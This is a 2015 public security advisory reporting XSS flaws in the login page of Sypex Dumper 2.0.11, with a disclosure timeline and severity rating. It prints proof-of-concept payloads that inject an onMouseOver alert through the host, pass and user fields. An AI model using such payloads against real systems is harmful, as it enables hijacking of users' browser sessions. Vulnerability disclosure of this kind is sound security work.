Credits: John Page ( hyp3rlinx )
Domains:  hyp3rlinx.altervista.org

Source:
http://hyp3rlinx.altervista.org/advisories/AS-SYPEX0529.txt

Vendor:
https://sypex.net


Product:
Sypex Dumper 2.0.11 is a PHP web based MySQL database management system.


Advisory Information:
================================================
Sypex Dumper 2.0.11 XSS Vulnerabilities



Vulnerability Details:
=====================
Login page input fields are vulnerable to XSS via POST method.
Allowing remote attackers to execute arbitrary code in the
context of an user's browser session.


Exploit code(s):
===============
  
host="onMouseOver="alert(666);
pass="onMouseOver="alert(666);
user="onMouseOver="alert(666);



Disclosure Timeline:
=========================================================


Vendor Notification:  May 27, 2015
May 29, 2015: Public Disclosure



Severity Level:
=========================================================
Med



Description:
==========================================================

Request Method(s):
                                [+] POST

Vulnerable Product:
                                [+] Sypex Dumper 2.0.11

Vulnerable Parameter(s):
                                [+] host, pass, user

Affected Area(s):
                                [+] Login page

===============================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.


(hyp3rlinx)